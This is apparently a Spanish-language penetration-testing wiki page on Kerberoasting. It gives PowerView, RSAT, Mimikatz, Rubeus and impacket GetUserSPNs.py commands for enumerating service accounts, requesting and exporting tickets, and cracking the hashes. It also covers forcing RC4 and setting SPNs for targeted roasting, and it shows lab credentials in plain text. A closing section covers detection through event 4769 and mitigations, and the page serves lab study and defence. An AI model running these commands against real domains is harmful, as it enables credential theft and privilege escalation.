Kerberoasting

Teoria

Diagrama:

Asignamos un servicio a un usuario para hacer las pruebas:

Set-ADUser -Identity adoree.kelcy -ServicePrincipalNames @{Add='cifs/WIN-SEUQGUTPHFM.INTERNAL.LOCAL:445'}
O
setspn -A <user_name>/WIN-SEUQGUTPHFM.INTERNAL.LOCAL:445 adoree.kelcy

para hace la consulta se necesita RSAT:

Solicitamos el ST:

NOTA: Se realiza esta operacion y desde el DC escuchamos los paquetes y sigamos los pasos segun el diagrama para analizar las peticiones:

Paso 1: AS-REQ

Paso 2: AS-REP

Paso 3: TGS-REQ

Paso 4: TGS-REP

comparamos con el hash que obtuvimos con impacket:

Por ultimo crackeamos el hash obtenido en la peticion TGS-REP:

Maneras de Obtener hashes de usuarios Kerberoastables

Powerview-dev/RSAT y Mimikatz:

### Ver todos los usuarios Keberoastables:
# Powerview
Get-NetUser -SPN
# RSAT
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName

### Obteniendo tickets
# PowerView

# RSAT
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local"

1: Obteniendo Usuarios Kerberoastables:

Powerview-dev:

RSAT:

2: Obteniendo Tickets:

Powerview-dev:

RSAT:

3: Exportamos esos tickets en un archivo con mimikatz:

Invoke-Mimikatz -Command '"kerberos::list /export"'

4: Crackeamos el ticket (usando tgsrepcrack.py)

Rubeus

Ghostpack-CompiledBinaries/Rubeus.exe at master · r3motecontrol/Ghostpack-CompiledBinariesGitHub

Rubeus.exe kerberoast /format:hashcat

En caso de que hayan habilitado AES por usuario:

Rubeus.exe kerberoast /user:admin_master tgtdeleg

Para que esto funcione la configuracion del Dominio aun tiene que admitir RC4. En muchas configuraciones solo habilitan el cifrado AES para cada usuario pero no deshabilitan RC4

Asi se habilita AES:

Pero es necesario deshabilitar el cifrado RC4:

Una vez deshabilitado RC4 los hashes que obtendra aun se pueden crackear pero es mucho mas complicado:

GetUserSPNs.py

python3 /usr/share/doc/python3-impacket/examples/GetUserSPNs.py internal.layer8prueba.com/jcontreras:Jehiko_123

python3 /usr/share/doc/python3-impacket/examples/GetUserSPNs.py -dc-ip 10.200.62.117 throwback.local/BlaireJ:7eQgx6YzxgG3vC45t5k9 -request

Obtener hashes:

python3 /usr/share/doc/python3-impacket/examples/GetUserSPNs.py internal.layer8prueba.com/jcontreras:Jehiko_123 -request

Seteando SPN

Con suficientes derechos (GenericAll/GenericWrite), el SPN de un usuario de destino se puede establecer en cualquier cosa (único en el dominio). Entonces podemos solicitar un TGS sin privilegios especiales. El TGS puede entonces ser "Kerberoasted".

1: Ver que tenemos los permisos correctos sobre el usuario a modificar

(somos parte del grupo rdpusers)

2: Identificar si el usuario tiene otro SPN:

# Powerview-dev
Get-DomainUser -Identity support30user | select serviceprincipalname
# RSAT
Get-ADUser -Identity support30user -Properties ServicePrincipalName |select ServicePrincipalName

3: Seteando el SPN en el usuario:

# Powerview-dev
Set-DomainObject -Identity support30user -Set @{serviceprincipalname='prueba/xoprantes'}
# RSAT
Set-ADUser -Identity support30user -ServicePrincipalNames @{Add='ops/whatever1'}

Deteccion

Eventos:

Security Event ID 4769 - Se solicitó un ticket Kerberos

Dado que 4769 se registra con mucha frecuencia en un DC. Es posible que deseemos filtrar los resultados en función de la siguiente información de los registros:

El nombre del servicio no debe ser krbtgt
El nombre del servicio no termina con $ (para filtrar las cuentas de máquinas utilizadas para los servicios)
El nombre de la cuenta no debe ser máquina@dominio (para filtrar las solicitudes de las máquinas)
El código de falla es '0x0' (para filtrar las fallas, 0x0 es un éxito)
Lo más importante es que el tipo de cifrado del ticket es 0x17

Una sola línea de PowerShell para pruebas rápidas:

Get-WinEvent -FilterHashtable @{Logname='Security';ID=4769} -MaxEvents 1000 | ?{$_.Message.split("`n")[8] -ne 'krbtgt' -and $_.Message.split("`n")[8] -ne '*$' -and $_.Message.split("`n")[3] -notlike '*$@*' -and$_.Message.split("`n")[18] -like '*0x0*' -and $_.Message.split("`n")[17] -like "*0x17*"} | select -ExpandProperty message

Mitigacion

Las contraseñas de las cuentas de servicio deben ser difíciles de adivinar (más de 25 caracteres)
Usar Cuentas de Servicio Administradas (Cambio automático de contraseña periódicamente y Administración SPN delegada)
https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/jj128431(v=ws.11)

PreviousEscalacion por Kerberos NextASREProasting

Last updated 2 years ago

hashtagTeoria

hashtagDiagrama:

hashtagSolicitamos el ST:

hashtagPaso 1: AS-REQ

hashtagPaso 2: AS-REP

hashtagPaso 3: TGS-REQ

hashtagPaso 4: TGS-REP

hashtagManeras de Obtener hashes de usuarios Kerberoastables

hashtagPowerview-dev/RSAT y Mimikatz:

hashtag1: Obteniendo Usuarios Kerberoastables:

hashtag2: Obteniendo Tickets:

hashtag3: Exportamos esos tickets en un archivo con mimikatz:

hashtag4: Crackeamos el ticket (usando tgsrepcrack.py)

hashtagRubeus

hashtagGetUserSPNs.py

hashtagSeteando SPN

hashtag1: Ver que tenemos los permisos correctos sobre el usuario a modificar

hashtag2: Identificar si el usuario tiene otro SPN:

hashtag3: Seteando el SPN en el usuario:

hashtagDeteccion

hashtagEventos:

hashtagMitigacion